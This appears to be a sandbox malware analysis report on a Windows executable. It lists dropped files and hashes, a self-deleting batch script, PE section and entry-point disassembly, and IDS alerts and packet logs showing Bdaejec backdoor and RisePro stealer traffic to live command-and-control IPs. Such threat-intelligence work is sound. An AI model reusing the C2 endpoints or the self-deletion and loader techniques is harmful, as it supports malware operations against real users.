SSDEEP:	49152:e8GpcxEHvbuWvpD3pQcVTVx5QBUu/ApBsUIjtpULzhhLAJFhr:eRy0pBFrnu/ApBsUIRaLzv6
MD5:	6A672BBDC7865A7518441284D853F8D8
SHA1:	BE887B22A197194E90F9A090174F258BDB062562
SHA-256:	A3F809A16001F7EDEA3B2C946286C80DB82531A8CD037320FBA6CF8BBCF68284
SHA-512:	0E4F83CC50CF975D8CCEE5D61B009E877B9FBC680B64E04A540A92C9601462ADE0182376053FE15D0B8EF1AF89DD46C06B25BAAFD0A597832600C03900AFE5EE
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 95%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......C.........L.....L.....L.....H.G...H.....H.....H...R.L.....L.....L...............E.....-........Rich..................PE..L....~.e...............".....,.......p]...........@...........................]...........@.................................T...h....p.............................................................................................................. . .`..........................@....rsrc........p... ..................@....idata ............. ..............@... ..,.........."..............@...xhwtmwwr.....`A......$..............@...tmaftcgf.....0].......$.............@....taggant.0...@].."....$.............@....%.~.u...P...p]..B....%............. ...................................................................................................................................................

C:\Users\user\AppData\Local\RageMP131\RageMP131.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Local\Temp\229772F3.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\MlpxPf.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Temp\43f50b5b.bat

Download File

Process:	C:\Users\user\AppData\Local\Temp\MlpxPf.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	190
Entropy (8bit):	4.96413399469641
Encrypted:	false
SSDEEP:	3:jdKZOCHyg4E2J5xAIAVdJ0diyMD2UCHyg4E2J5xAIAVdJ0di4KReJsjIdKZOCHyS:jdKoCHhJ23fwdJ0dbMD2UCHhJ23fwdJb
MD5:	1392C192EAF3372FE008AB695421604D
SHA1:	48C771A0899CA4A6E3E0CF2EB72123FEFBC5FB26
SHA-256:	6A5D90FD2237C9FF4D609EC1EB4D2B4E891568A554154A39F14D5B200AB2CD13
SHA-512:	5727DAAC182456F82B2D4F0996CCCB0300FD2A544F569014E7798874031113A8C7EF5A0B1015217CABC5DB20A6B7E79D2910E3F0DD58213C3A47513F47CC039A
Malicious:	false
Preview:	:DELFILE..del "C:\Users\user\AppData\Local\Temp\MlpxPf.exe"..if exist "C:\Users\user\AppData\Local\Temp\MlpxPf.exe" goto :DELFILE..del "C:\Users\user\AppData\Local\Temp\43f50b5b.bat"..

C:\Users\user\AppData\Local\Temp\5A42065E.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\MlpxPf.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Temp\61C82BFB.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\MlpxPf.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Temp\63655949.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\MlpxPf.exe
File Type:	ASCII text
Category:	modified
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Temp\63730BF4.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\MlpxPf.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Temp\6DD449CA.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\MlpxPf.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Temp\70E05704.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\MlpxPf.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Temp\MlpxPf.exe

Download File

Process:	C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	15872
Entropy (8bit):	7.031075575407894
Encrypted:	false
SSDEEP:	384:IXZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:gQGPL4vzZq2o9W7GsxBbPr
MD5:	F7D21DE5C4E81341ECCD280C11DDCC9A
SHA1:	D4E9EF10D7685D491583C6FA93AE5D9105D815BD
SHA-256:	4485DF22C627FA0BB899D79AA6FF29BC5BE1DBC3CAA2B7A490809338D54B7794
SHA-512:	E4553B86B083996038BACFB979AD0B86F578F95185D8EFAC34A77F6CC73E491D4F70E1449BBC9EB1D62F430800C1574101B270E1CB0EEED43A83049A79B636A3
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 92%
Joe Sandbox View:	Filename: Lisect_AVT_24003_G1A_70.exe, Detection: malicious, Browse Filename: Lisect_AVT_24003_G1A_72.exe, Detection: malicious, Browse Filename: Lisect_AVT_24003_G1A_5.exe, Detection: malicious, Browse Filename: Lisect_AVT_24003_G1A_16.exe, Detection: malicious, Browse Filename: LisectAVT_2403002C_193.exe, Detection: malicious, Browse Filename: LisectAVT_2403002C_196.exe, Detection: malicious, Browse Filename: LisectAVT_2403002B_91.exe, Detection: malicious, Browse Filename: LisectAVT_2403002B_492.exe, Detection: malicious, Browse Filename: LisectAVT_2403002B_97.exe, Detection: malicious, Browse Filename: LisectAVT_2403002B_28.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........I.>.'..'.>.'..\.2.'.#.(.?.'.>.&.y.'.Q.#.=.'..).?.'.7...6.'.7...?.'.Rich>.'.................PE..L...JG.R.............................`.......0....@.......................................@..................................p...............................o.......................................................................................text.... ..........................`....rdata.......0......................@....data........@......................@....reloc.......P.......(..............@....aspack.. ...`.......,..............`....adata...............>..............@...................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\rage131MP.tmp

Download File

Process:	C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe
File Type:	ASCII text, with no line terminators
Category:	modified
Size (bytes):	13
Entropy (8bit):	2.4116022179746714
Encrypted:	false
SSDEEP:	3:LEfUaWO:4U6
MD5:	106D833AA2CDB26927462EB59D1FDCFF
SHA1:	98120D54BBA06EB97399DEA812463DCDB4C21FB4
SHA-256:	8672E274B253B3E2280558A185EFF8718CE4DA86D8220FAFD6052618410B5650
SHA-512:	25E80AE341F6AB203BE0453F442E640902B23AD6382D604390CD1609092B9556A29C7281E14855FF35AFC6F58FDA67D869BE790B478C8927E115DDEB37CC161B
Malicious:	false
Preview:	1721881383412

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Users\user\AppData\Local\Temp\MlpxPf.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.3724235502129964
Encrypted:	false
SSDEEP:	6144:mFVfpi6ceLP/9skLmb0ayWWSPtaJG8nAge35OlMMhA2AX4WABlguNiiL:mV1QyWWI/glMM6kF7Yq
MD5:	0DA24B3E8310BDB0144411954CE211F1
SHA1:	EA2C551753655DB7F6BECD3BAE477C9C6AD5CD68
SHA-256:	E50298F0E4BE72EA173A24A0FF1586E230F58726905F3B8917125E42AF0460CA
SHA-512:	6DCA85FD369CC1695D0EF4BA29FF8C0271842965AAA08099CD5BC3A8455060162ABEE2DDD8E14D628440A51D9B0CB04AD7EAAF3278016BCC5548A70793BFAF2A
Malicious:	false
Preview:	regfD...D....\.Z.................... ....@......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmj/..=..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.930391577466747
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Lisect_AVT_24003_G1A_37.exe
File size:	2'447'360 bytes
MD5:	6a672bbdc7865a7518441284d853f8d8
SHA1:	be887b22a197194e90f9a090174f258bdb062562
SHA256:	a3f809a16001f7edea3b2c946286c80db82531a8cd037320fba6cf8bbcf68284
SHA512:	0e4f83cc50cf975d8ccee5d61b009e877b9fbc680b64e04a540a92c9601462ade0182376053fe15d0b8ef1af89dd46c06b25baafd0a597832600c03900afe5ee
SSDEEP:	49152:e8GpcxEHvbuWvpD3pQcVTVx5QBUu/ApBsUIjtpULzhhLAJFhr:eRy0pBFrnu/ApBsUIRaLzv6
TLSH:	FDB523DC7D4289A3C7D4663058C3F779069ACC86A99800CE3EDD7FB7BA35E292463518
File Content Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......C...............L.......L.......L.......H.G.....H.......H.......H...R...L.......L.......L.........................E.......-....

File Icon


Icon Hash:	7192ecece8b2924d

Static PE Info

General

Entrypoint:	0x9d7000
Entrypoint Section:	%~u
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x65CC7EFE [Wed Feb 14 08:51:10 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
sub esp, 0000016Ch
xor eax, eax
push ebx
push esi
push edi
mov dword ptr [ebp-24h], eax
mov dword ptr [ebp-10h], eax
mov dword ptr [ebp-14h], eax
mov dword ptr [ebp-08h], eax
mov dword ptr [ebp-0Ch], eax
mov dword ptr [ebp-20h], eax
mov dword ptr [ebp-18h], eax
mov dword ptr [ebp-48h], 78706C4Dh
mov dword ptr [ebp-44h], 652E6650h
mov dword ptr [ebp-40h], 00006578h
mov dword ptr [ebp-3Ch], 00000000h
call 00007FA4C86F1165h
pop eax
add eax, 00000225h
mov dword ptr [ebp-04h], eax
mov eax, dword ptr fs:[00000030h]
mov dword ptr [ebp-28h], eax
mov eax, dword ptr [ebp-04h]
mov dword ptr [eax], E904C483h
mov eax, dword ptr [ebp-04h]
mov dword ptr [eax+04h], FFFFCD8Fh
mov eax, dword ptr [ebp-28h]
mov eax, dword ptr [eax+0Ch]
mov eax, dword ptr [eax+1Ch]
mov eax, dword ptr [eax]
mov eax, dword ptr [eax+08h]
mov ecx, dword ptr [eax+3Ch]
mov ecx, dword ptr [ecx+eax+78h]
add ecx, eax
mov edi, dword ptr [ecx+1Ch]
mov ebx, dword ptr [ecx+20h]
mov esi, dword ptr [ecx+24h]
mov ecx, dword ptr [ecx+18h]
add esi, eax
add edi, eax
add ebx, eax
xor edx, edx
mov dword ptr [ebp-30h], esi
mov dword ptr [ebp-1Ch], edx
mov dword ptr [ebp-34h], ecx
cmp edx, dword ptr [ebp-34h]
jnc 00007FA4C86F12AEh
movzx ecx, word ptr [esi+edx*2]
mov edx, dword ptr [ebx+edx*4]
mov esi, dword ptr [edi+ecx*4]
add edx, eax
mov ecx, dword ptr [edx]
add esi, eax
cmp ecx, 4D746547h
jne 00007FA4C86F11B4h
cmp dword ptr [edx+04h], 6C75646Fh
jne 00007FA4C86F11ABh

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x149054	0x68	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x137000	0x110a0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x1491f8	0x8	.idata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x136000	0x8f000	1a3df3126f5ba5bf1d667445369e6268	False	0.9992931872814685	data	7.988087309899931	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x137000	0x110a0	0x2000	4f9236427260519fddc15cf7411ca257	False	0.9830322265625	data	7.908465475006033	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x149000	0x1000	0x200	588e00183b8b4dbb8c7106492f04143d	False	0.14453125	data	0.9824704719748909	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x14a000	0x2cc000	0x200	695ba53710a5719d05251331289e357d	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
xhwtmwwr	0x416000	0x1bd000	0x1bca00	7ff73970910d1f52d5471815d43367a8	False	0.9615063606972167	data	7.91333326585716	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
tmaftcgf	0x5d3000	0x1000	0x600	5a8f32f49825274c215abc308fc9fe35	False	0.5950520833333334	data	5.090080093373078	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x5d4000	0x3000	0x2200	3ff11ea398d3ea4e600728c15030b089	False	0.053423713235294115	DOS executable (COM)	0.5511361865848894	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
%~u	0x5d7000	0x5000	0x4200	872f8de04072afbed97db9961b82cff1	False	0.7774621212121212	data	6.934432600748185	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x5c1a28	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 3779 x 3779 px/m	Russian	Russia	0.10367620962971726
RT_GROUP_ICON	0x5d2250	0x14	data	Russian	Russia	1.15
RT_VERSION	0x5d2264	0x2b4	data	Russian	Russia	0.48121387283236994
RT_MANIFEST	0x5d2518	0x2e6	XML 1.0 document, ASCII text, with CRLF line terminators			0.45417789757412397
RT_MANIFEST	0x5d27fe	0x17d	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5931758530183727

Imports

DLL	Import
kernel32.dll	lstrcpy

Possible Origin

Language of compilation system	Country where language is spoken	Map
Russian	Russia
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Source Port	Dest Port	Source IP	Dest IP
2024-07-25T04:53:12.283927+0200	UDP	2838522	ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup	63806	53	192.168.2.8	1.1.1.1
2024-07-25T04:53:42.698687+0200	TCP	2807908	ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin	49722	799	192.168.2.8	44.221.84.105
2024-07-25T04:53:25.674940+0200	TCP	2046269	ET MALWARE [ANY.RUN] RisePro TCP (Activity)	49712	50500	192.168.2.8	193.233.132.62
2024-07-25T04:53:20.335736+0200	TCP	2046269	ET MALWARE [ANY.RUN] RisePro TCP (Activity)	49706	50500	192.168.2.8	193.233.132.62
2024-07-25T04:53:36.849216+0200	TCP	2046269	ET MALWARE [ANY.RUN] RisePro TCP (Activity)	49719	50500	192.168.2.8	193.233.132.62
2024-07-25T04:53:22.721123+0200	TCP	2049060	ET MALWARE RisePro TCP Heartbeat Packet	49713	50500	192.168.2.8	193.233.132.62
2024-07-25T04:53:30.531280+0200	TCP	2807908	ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin	49717	799	192.168.2.8	44.221.84.105
2024-07-25T04:53:17.362336+0200	TCP	2049060	ET MALWARE RisePro TCP Heartbeat Packet	49706	50500	192.168.2.8	193.233.132.62
2024-07-25T04:53:12.855208+0200	TCP	2807908	ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin	49704	799	192.168.2.8	44.221.84.105
2024-07-25T04:53:36.819100+0200	TCP	2807908	ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin	49720	799	192.168.2.8	44.221.84.105
2024-07-25T04:53:16.800194+0200	TCP	2807908	ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin	49705	799	192.168.2.8	44.221.84.105
2024-07-25T04:53:27.676877+0200	TCP	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	443	49714	20.114.59.183	192.168.2.8
2024-07-25T04:53:39.900149+0200	TCP	2807908	ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin	49721	799	192.168.2.8	44.221.84.105
2024-07-25T04:54:05.326511+0200	TCP	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	443	49723	20.114.59.183	192.168.2.8
2024-07-25T04:53:23.435986+0200	TCP	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	49711	443	192.168.2.8	20.189.173.22
2024-07-25T04:53:33.718695+0200	TCP	2807908	ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin	49718	799	192.168.2.8	44.221.84.105
2024-07-25T04:53:25.690426+0200	TCP	2046269	ET MALWARE [ANY.RUN] RisePro TCP (Activity)	49713	50500	192.168.2.8	193.233.132.62

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 25, 2024 04:53:12.449678898 CEST	49704	799	192.168.2.8	44.221.84.105
Jul 25, 2024 04:53:12.454502106 CEST	799	49704	44.221.84.105	192.168.2.8
Jul 25, 2024 04:53:12.454590082 CEST	49704	799	192.168.2.8	44.221.84.105
Jul 25, 2024 04:53:12.499470949 CEST	49704	799	192.168.2.8	44.221.84.105
Jul 25, 2024 04:53:12.504234076 CEST	799	49704	44.221.84.105	192.168.2.8
Jul 25, 2024 04:53:12.855098963 CEST	799	49704	44.221.84.105	192.168.2.8
Jul 25, 2024 04:53:12.855207920 CEST	49704	799	192.168.2.8	44.221.84.105
Jul 25, 2024 04:53:12.855241060 CEST	799	49704	44.221.84.105	192.168.2.8
Jul 25, 2024 04:53:12.855297089 CEST	49704	799	192.168.2.8	44.221.84.105
Jul 25, 2024 04:53:12.867847919 CEST	49704	799	192.168.2.8	44.221.84.105
Jul 25, 2024 04:53:12.872669935 CEST	799	49704	44.221.84.105	192.168.2.8
Jul 25, 2024 04:53:16.367356062 CEST	49705	799	192.168.2.8	44.221.84.105
Jul 25, 2024 04:53:16.374183893 CEST	799	49705	44.221.84.105	192.168.2.8
Jul 25, 2024 04:53:16.374273062 CEST	49705	799	192.168.2.8	44.221.84.105
Jul 25, 2024 04:53:16.374454975 CEST	49705	799	192.168.2.8	44.221.84.105
Jul 25, 2024 04:53:16.380223989 CEST	799	49705	44.221.84.105	192.168.2.8
Jul 25, 2024 04:53:16.800087929 CEST	799	49705	44.221.84.105	192.168.2.8
Jul 25, 2024 04:53:16.800194025 CEST	49705	799	192.168.2.8	44.221.84.105
Jul 25, 2024 04:53:16.800203085 CEST	799	49705	44.221.84.105	192.168.2.8
Jul 25, 2024 04:53:16.800251961 CEST	49705	799	192.168.2.8	44.221.84.105
Jul 25, 2024 04:53:16.801208019 CEST	49705	799	192.168.2.8	44.221.84.105
Jul 25, 2024 04:53:16.805984974 CEST	799	49705	44.221.84.105	192.168.2.8
Jul 25, 2024 04:53:17.329340935 CEST	49706	50500	192.168.2.8	193.233.132.62
Jul 25, 2024 04:53:17.334285975 CEST	50500	49706	193.233.132.62	192.168.2.8
Jul 25, 2024 04:53:17.334409952 CEST	49706	50500	192.168.2.8	193.233.132.62
Jul 25, 2024 04:53:17.362335920 CEST	49706	50500	192.168.2.8	193.233.132.62
Jul 25, 2024 04:53:17.367249012 CEST	50500	49706	193.233.132.62	192.168.2.8
Jul 25, 2024 04:53:20.335736036 CEST	49706	50500	192.168.2.8	193.233.132.62
Jul 25, 2024 04:53:20.342374086 CEST	50500	49706	193.233.132.62	192.168.2.8
Jul 25, 2024 04:53:22.677882910 CEST	49712	50500	192.168.2.8	193.233.132.62
Jul 25, 2024 04:53:22.680994034 CEST	49713	50500	192.168.2.8	193.233.132.62
Jul 25, 2024 04:53:22.689771891 CEST	50500	49712	193.233.132.62	192.168.2.8
Jul 25, 2024 04:53:22.689855099 CEST	49712	50500	192.168.2.8	193.233.132.62
Jul 25, 2024 04:53:22.692267895 CEST	50500	49713	193.233.132.62	192.168.2.8
Jul 25, 2024 04:53:22.692344904 CEST	49713	50500	192.168.2.8	193.233.132.62
Jul 25, 2024 04:53:22.717916965 CEST	49712	50500	192.168.2.8	193.233.132.62
Jul 25, 2024 04:53:22.721122980 CEST	49713	50500	192.168.2.8	193.233.132.62
Jul 25, 2024 04:53:22.722872019 CEST	50500	49712	193.233.132.62	192.168.2.8
Jul 25, 2024 04:53:22.726083040 CEST	50500	49713	193.233.132.62	192.168.2.8
Jul 25, 2024 04:53:25.674940109 CEST	49712	50500	192.168.2.8	193.233.132.62
Jul 25, 2024 04:53:25.689497948 CEST	50500	49712	193.233.132.62	192.168.2.8
Jul 25, 2024 04:53:25.690426111 CEST	49713	50500	192.168.2.8	193.233.132.62
Jul 25, 2024 04:53:25.695415020 CEST	50500	49713	193.233.132.62	192.168.2.8
Jul 25, 2024 04:53:30.104712009 CEST	49717	799	192.168.2.8	44.221.84.105
Jul 25, 2024 04:53:30.109580040 CEST	799	49717	44.221.84.105	192.168.2.8
Jul 25, 2024 04:53:30.109664917 CEST	49717	799	192.168.2.8	44.221.84.105
Jul 25, 2024 04:53:30.109827995 CEST	49717	799	192.168.2.8	44.221.84.105
Jul 25, 2024 04:53:30.114590883 CEST	799	49717	44.221.84.105	192.168.2.8
Jul 25, 2024 04:53:30.531214952 CEST	799	49717	44.221.84.105	192.168.2.8
Jul 25, 2024 04:53:30.531235933 CEST	799	49717	44.221.84.105	192.168.2.8
Jul 25, 2024 04:53:30.531280041 CEST	49717	799	192.168.2.8	44.221.84.105
Jul 25, 2024 04:53:30.531328917 CEST	49717	799	192.168.2.8	44.221.84.105
Jul 25, 2024 04:53:30.533118963 CEST	49717	799	192.168.2.8	44.221.84.105
Jul 25, 2024 04:53:30.537950993 CEST	799	49717	44.221.84.105	192.168.2.8
Jul 25, 2024 04:53:33.312210083 CEST	49718	799	192.168.2.8	44.221.84.105
Jul 25, 2024 04:53:33.317240953 CEST	799	49718	44.221.84.105	192.168.2.8
Jul 25, 2024 04:53:33.317521095 CEST	49718	799	192.168.2.8	44.221.84.105
Jul 25, 2024 04:53:33.321059942 CEST	49718	799	192.168.2.8	44.221.84.105
Jul 25, 2024 04:53:33.325908899 CEST	799	49718	44.221.84.105	192.168.2.8
Jul 25, 2024 04:53:33.718573093 CEST	799	49718	44.221.84.105	192.168.2.8
Jul 25, 2024 04:53:33.718594074 CEST	799	49718	44.221.84.105	192.168.2.8
Jul 25, 2024 04:53:33.718694925 CEST	49718	799	192.168.2.8	44.221.84.105
Jul 25, 2024 04:53:33.719923019 CEST	49718	799	192.168.2.8	44.221.84.105
Jul 25, 2024 04:53:33.724747896 CEST	799	49718	44.221.84.105	192.168.2.8
Jul 25, 2024 04:53:33.844114065 CEST	49719	50500	192.168.2.8	193.233.132.62
Jul 25, 2024 04:53:33.849138021 CEST	50500	49719	193.233.132.62	192.168.2.8
Jul 25, 2024 04:53:33.849245071 CEST	49719	50500	192.168.2.8	193.233.132.62
Jul 25, 2024 04:53:33.885987043 CEST	49719	50500	192.168.2.8	193.233.132.62
Jul 25, 2024 04:53:33.890839100 CEST	50500	49719	193.233.132.62	192.168.2.8
Jul 25, 2024 04:53:36.231684923 CEST	49720	799	192.168.2.8	44.221.84.105
Jul 25, 2024 04:53:36.239444971 CEST	799	49720	44.221.84.105	192.168.2.8
